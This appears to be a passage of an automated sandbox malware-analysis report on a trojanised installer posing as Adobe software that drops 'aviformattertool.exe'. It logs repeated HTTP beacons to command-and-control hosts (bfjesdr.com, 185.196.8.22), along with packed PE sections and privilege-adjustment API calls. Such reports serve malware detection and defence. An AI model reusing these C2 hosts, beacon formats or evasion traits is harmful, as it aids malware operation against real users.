                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1Host: bfjesdr.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: unknownDNS traffic detected: queries for: bfjesdr.com
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.22/
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.22/nq
                Source: aviformattertool.exe, 00000003.00000002.2905692727.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, aviformattertool.exe, 00000003.00000002.2905960096.000000000380C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f
                Source: aviformattertool.exe, 00000003.00000002.2904440169.00000000008AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.196.8.22/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14
                Source: is-NLBLP.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: is-R0SOB.tmp.1.drString found in binary or memory: http://lame.sf.net
                Source: is-R0SOB.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                Source: is-OJAID.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: is-RTU9Q.tmp.1.dr, is-JAMVB.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: is-JAMVB.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                Source: is-R0SOB.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                Source: is-R0SOB.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                Source: is-B8D2L.tmp.1.drString found in binary or memory: http://www.mpg123.de
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmp, adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmp, adobe.tmp, 00000001.00000000.1647787530.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-D26SF.tmp.1.dr, adobe.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                Source: is-L5R6H.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                Source: is-JAMVB.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: is-RTU9Q.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                System Summary

                barindex
                PE file has nameless sections
                Source: is-ETIM8.tmp.1.drStatic PE information: section name:
                Source: is-ETIM8.tmp.1.drStatic PE information: section name:
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-N9KV6.tmp.1.drStatic PE information: section name:
                Source: is-SD2K4.tmp.1.drStatic PE information: section name:
                Source: is-SD2K4.tmp.1.drStatic PE information: section name:
                Source: is-CHQ62.tmp.1.drStatic PE information: section name:
                Source: is-CHQ62.tmp.1.drStatic PE information: section name:
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-USOE1.tmp.1.drStatic PE information: section name:
                Source: is-TA1T4.tmp.1.drStatic PE information: section name:
                Source: is-TA1T4.tmp.1.drStatic PE information: section name:
                Source: is-G2Q7A.tmp.1.drStatic PE information: section name:
                Source: is-G2Q7A.tmp.1.drStatic PE information: section name:
                Source: is-RTU9Q.tmp.1.drStatic PE information: section name:
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-QIBJG.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: is-G867L.tmp.1.drStatic PE information: section name:
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045688C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045688C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004776DC NtdllDefWindowProc_A,1_2_004776DC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00454B10 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B10
                Source: C:\Users\user\Desktop\adobe.exeCode function: 0_2_0040840C0_2_0040840C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00466BB81_2_00466BB8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0047F1BC1_2_0047F1BC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0046F7F01_2_0046F7F0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0048600C1_2_0048600C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004301D01_2_004301D0
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004442C41_2_004442C4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0048C3141_2_0048C314
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045E8EC1_2_0045E8EC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045A9941_2_0045A994
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004449BC1_2_004449BC
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00434B1C1_2_00434B1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00468C401_2_00468C40
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00430D5C1_2_00430D5C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00444DC81_2_00444DC8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0045102C1_2_0045102C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_004850D81_2_004850D8
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00443D1C1_2_00443D1C
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_00433E181_2_00433E18
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_023112601_2_02311260
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: 1_2_02311D201_2_02311D20
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_004010512_2_00401051
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 2_2_00401C262_2_00401C26
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_004010513_2_00401051
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_00401C263_2_00401C26
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A2E1CD3_2_02A2E1CD
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A29EC43_2_02A29EC4
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A34E693_2_02A34E69
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A1EFFA3_2_02A1EFFA
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A284823_2_02A28482
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A2DCD93_2_02A2DCD9
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A2AC7A3_2_02A2AC7A
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A2E5E53_2_02A2E5E5
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A32DF43_2_02A32DF4
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AVI formatter tool\bin\x86\7z.exe (copy) 59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 004458F8 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00405964 appears 110 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00445628 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00408C14 appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00406ACC appears 39 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00403400 appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00433D30 appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 004078FC appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00457214 appears 70 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00403494 appears 82 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00457008 appears 93 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 004529B4 appears 91 times
                Source: C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmpCode function: String function: 00403684 appears 219 times
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: String function: 02A28B20 appears 37 times
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: String function: 02A35370 appears 138 times
                Source: adobe.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: adobe.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: adobe.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: adobe.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: adobe.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Source: is-D26SF.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                Source: is-OJAID.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: is-2NPHT.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: is-1V9NR.tmp.1.drStatic PE information: Number of sections : 11 > 10
                Source: adobe.exe, 00000000.00000003.1647104084.00000000024C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs adobe.exe
                Source: adobe.exe, 00000000.00000003.1647263045.0000000002298000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs adobe.exe
                Source: adobe.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: aviformattertool.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: _RegDLL.tmp.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: JSON Nested Objects 66.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: is-ETIM8.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9908203125
                Source: is-CHQ62.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9903624487704918
                Source: is-USOE1.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9891526442307692
                Source: is-G2Q7A.tmp.1.drStatic PE information: Section: ZLIB complexity 0.9976058467741935
                Source: is-QIBJG.tmp.1.drStatic PE information: Section: ZLIB complexity 0.995148689516129
                Source: classification engineClassification label: mal100.troj.evad.winEXE@7/102@1/2
                Source: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exeCode function: 3_2_02A208F8 FormatMessageA,GetLastError,3_2_02A208F8
